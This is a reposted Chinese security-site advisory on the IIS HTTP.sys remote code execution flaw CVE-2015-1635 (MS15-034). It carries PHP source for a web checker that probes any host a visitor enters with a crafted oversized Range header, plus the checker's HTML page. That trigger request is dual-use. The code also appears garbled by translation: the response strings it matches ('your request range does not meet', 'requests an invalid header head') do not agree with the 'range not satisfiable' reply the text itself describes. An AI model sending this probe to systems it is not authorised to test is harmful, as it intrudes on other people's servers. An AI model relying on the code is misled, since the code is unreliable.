IIS latest high-risk vulnerability, CVE-2015-1635 (MS15-034): the PoC and online detection source — vulnerability warning — the black bar safety net

2015-04-16T00:00:00
ID MYHACK58:62201561261
Type myhack58
Reporter 佚名
Modified 2015-04-16T00:00:00

Description

HTTP.sys remote code execution vulnerability, CVE-2015-1635 (MS15-034). A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys), caused when HTTP.sys does not correctly parse a specially crafted HTTP request. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account. https://technet.microsoft.com/zh-cn/library/security/MS15-034

Online detection source code

The check below sends one request carrying an out-of-range `Range` header and classifies the host by the error text in the reply: a "range not satisfiable" answer is taken as vulnerable (and as IIS only if the reply also names Microsoft), an "invalid header" answer as patched, and anything else as undetermined (with a special case for a CloudFlare 403 in front of the origin); results are cached in memcached for five minutes, or one hour for a patched result.

```php
<?php
class VulnStatus {
    const FAIL        = 0;
    const VULN        = 1;
    const VULN_NOT_MS = 2;
    const PATCHED     = 3;
    const NOT_VULN    = 4;
    const NOT_VULN_MS = 5;
    const NOT_VULN_CF = 6;

    public static function AsString( $status, $host ) {
        switch( $status ) {
            case self::FAIL       : return 'unable to connect to ' . $host . ' Test loophole.';
            case self::VULN       : return '' . $host . ' The presence of vulnerability.';
            case self::VULN_NOT_MS: return '' . $host . ' There may be loopholes, but it seems to not use IIS.';
            case self::PATCHED    : return '' . $host . ' Has been repaired.';
            case self::NOT_VULN   : return 'can\'t identify the patch status ' . $host . ', And not using IIS, there may be no loopholes.';
            case self::NOT_VULN_MS: return 'can\'t identify the patch status ' . $host . '. There may be no loopholes.';
            case self::NOT_VULN_CF: return '' . $host . ' Possible use of the CloudFlare CDN acceleration, causes the vulnerability can not be detected or does not exist.';
        }
        return 'as if broken.';
    }
}

$host   = false;
$status = false;
$url = filter_input( INPUT_GET, 'host', FILTER_SANITIZE_URL );
if( ! empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null ) {
    $url = 'http://' . $url;
}
$port = parse_url( $url, PHP_URL_PORT );
if( $port === null ) {
    $port = 80;
}
$url = parse_url( $url, PHP_URL_HOST );
if( $url !== null ) {
    $cachekey  = 'ms15034_' . $url . '_' . $port;
    $cachetime = 300; // 5 minutes
    $host = htmlspecialchars( $url, ENT_HTML5 );
    if( $port !== 80 ) {
        $host .= ':' . $port;
    }
    $memcached = new Memcached( );
    $memcached->addServer( '/var/run/memcached/memcached.sock', 0 );
    $status = $memcached->get( $cachekey );
    if( $status === false ) {
        $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );
        if( $fp === false ) {
            $status = VulnStatus::FAIL;
        } else {
            stream_set_timeout( $fp, 5 );
            $header  = "GET / HTTP/1.1\r\n";
            $header .= "Host: stuff\r\n";
            $header .= "Range: bytes=0-18446744073709551615\r\n";
            $header .= "Connection: close\r\n\r\n";
            fwrite( $fp, $header );
            $response = fread( $fp, 1024 );
            fclose( $fp );
            if( strpos( $response, 'your request range does not meet' ) !== false ) {
                $status = strpos( $response, 'Microsoft' ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;
            } else if( strpos( $response, 'requests an invalid header head' ) !== false ) {
                $cachetime = 3600; // cache time
                $status = VulnStatus::PATCHED;
            } else if( strpos( $response, 'Microsoft' ) === false ) {
                if( strpos( $response, '403 Forbidden' ) !== false && strpos( $response, 'cloudflare-nginx' ) !== false ) {
                    $status = VulnStatus::NOT_VULN_CF;
                } else {
                    $status = VulnStatus::NOT_VULN;
                }
            } else {
                $status = VulnStatus::NOT_VULN_MS;
            }
        }
        unset( $fp, $header, $response );
        $memcached->set( $cachekey, $status, $cachetime );
    }
    $status = VulnStatus::AsString( $status, $host );
}
?>
```

```html
<meta charset="utf-8">
<meta name="theme-color" content="#424242">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>MS15-034 Test</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.container { max-width: 900px; }
.masthead { position: relative; padding: 20px 0; text-align: center; color: #fff; background-color: #424242; margin-bottom: 20px; }
.masthead a { color: #fff; }
.footer { text-align: center; padding: 15px; color: #555; }
.footer span { color: #FA5994; }
.form-inline { text-align: center; margin-bottom: 20px; }
.github { position: absolute; top: 0; right: 0; }
</style>
```

Page text: "HTTP.sys stack vulnerability testing — Enter a URL or a hostname to test the server" — <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.
